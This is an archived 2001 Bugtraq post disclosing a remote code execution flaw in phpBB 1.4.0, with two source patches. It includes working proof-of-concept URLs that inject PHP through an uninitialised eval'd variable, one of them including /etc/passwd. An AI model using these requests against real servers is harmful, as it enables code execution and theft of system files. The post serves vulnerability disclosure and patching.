Bugtraq mailing list archives

Re: phpBB 1.4.0 bug leads to easy admin privileges

From: "Joao Gouveia" <tharbad () kaotik org>
Date: Sat, 4 Aug 2001 20:10:18 +0100

Hi all,

This is regarding a phpBB security hole found some months ago.
Since this one came out, and the other ( beeing a lot worst ) didn't, I
thought it might have some interest.
This aplies only to phpBB v1.4.0.

-----

----- Original Message -----
From: "UnderSpell" <underspell () accao net>
To: <james () phpbb com>
Sent: Thursday, May 17, 2001 12:15 PM
Subject: Security bug in phpBB



His there!

We've recente ( actually not so recently ) discover a way to run any code
using phpBB.

The aproach was very simple :
  At a given point you run a eval "eval($l_statsblock);" .
  Since  $l_statsblock is a language var we just have to find a way set up
us with a invalid lang file:
after login , go to user prefs and

http://hacks.phpbb.com/phpBB/prefs.php?viewemail=1&savecookie=0&sig=0&smile=
0&dishtml=0&disbbcode=0&themes=2&lang=THIS_IS_AN_INVALID_LANG_FILE&save=1&us
er=&submit=Gravar+Prefer%EAncias

By this time $l_statsblock is no longer initialized so we can do funny
stuff whith them , like :
  http://hacks.phpbb.com/phpBB/prefs.php?l_statsblock=phpinfo();
or

http://hacks.phpbb.com/phpBB/prefs.php?teste=/etc/passwd&l_statsblock=includ
e($teste);

and so on ... we only check the phpinfo against hack forum and the second
against my production and stagging boards.

You have tow ways to fix this :

1 ) Check if lang file exists ( when tries to include )

--- phpBB-1.4.0/auth.php        Wed Apr 25 05:47:59 2001
+++ phpBB/auth.php      Thu May 17 12:11:01 2001
@@ -273,16 +273,19 @@
  // Include the appropriate language file.
  if(!strstr($PHP_SELF, "admin"))
  {
-   include('language/lang_'.$default_lang.'.'.$phpEx);
+   $langfile = 'language/lang_'.$default_lang.'.'.$phpEx;
  }
  else
  {
     if(strstr($PHP_SELF, "topicadmin")) {
-     include('language/lang_'.$default_lang.'.'.$phpEx);
-       } else {
-     include('../language/lang_'.$default_lang.'.'.$phpEx);
-       }
+     $langfile ='language/lang_'.$default_lang.'.'.$phpEx;
+        } else {
+                $langfile = '../language/lang_'.$default_lang.'.'.$phpEx;
+        }
  }
+
+ if ( ! file_exists($langfile) ) { die("Invalid Language");}
+ else { include($langfile); }

  // See if translated pictures are available..
  $header_image = get_translated_file($header_image);


  // See if translated pictures are available..
  $header_image = get_translated_file($header_image);

2 ) Initialize $l_statsblock before trying to include ( prefered )

--- phpBB-1.4.0/auth.php        Wed Apr 25 05:47:59 2001
+++ phpBB/auth.php      Thu May 17 11:39:33 2001
@@ -269,6 +269,7 @@
  // set vars for all scripts
  $now_time = time();
  $last_visit = $temptime;
+$l_statsblock = '';

  // Include the appropriate language file.
  if(!strstr($PHP_SELF, "admin"))



  Credits for this should go for tharbad () kaotik org and

UnderSpell () accao net .


(A)UnderSpell


---


----- Original Message -----
From: <kill-9 () modernhackers com>
To: <bugtraq () securityfocus com>
Sent: Friday, August 03, 2001 8:51 PM
Subject: phpBB 1.4.0 bug leads to easy admin privileges

-New phpBB 1.4.x exploit
phpBB, is an open source bulletin board created by
the
phpBB group. Version 1.4.x of phpBB has a variable
input
validation problem that can lead to limited arbitrary sql
querys including gaining administrative access to the
board.

(...)


Best regards,

Joao Gouveia
--------------
tharbad () kaotik org

Current thread:

phpBB 1.4.0 bug leads to easy admin privileges kill-9 (Aug 03)
- Re: phpBB 1.4.0 bug leads to easy admin privileges Paul Burney (Aug 03)
- Re: phpBB 1.4.0 bug leads to easy admin privileges Joao Gouveia (Aug 06)
- <Possible follow-ups>
- Re: phpBB 1.4.0 bug leads to easy admin privileges Kaneda Akira (Aug 08)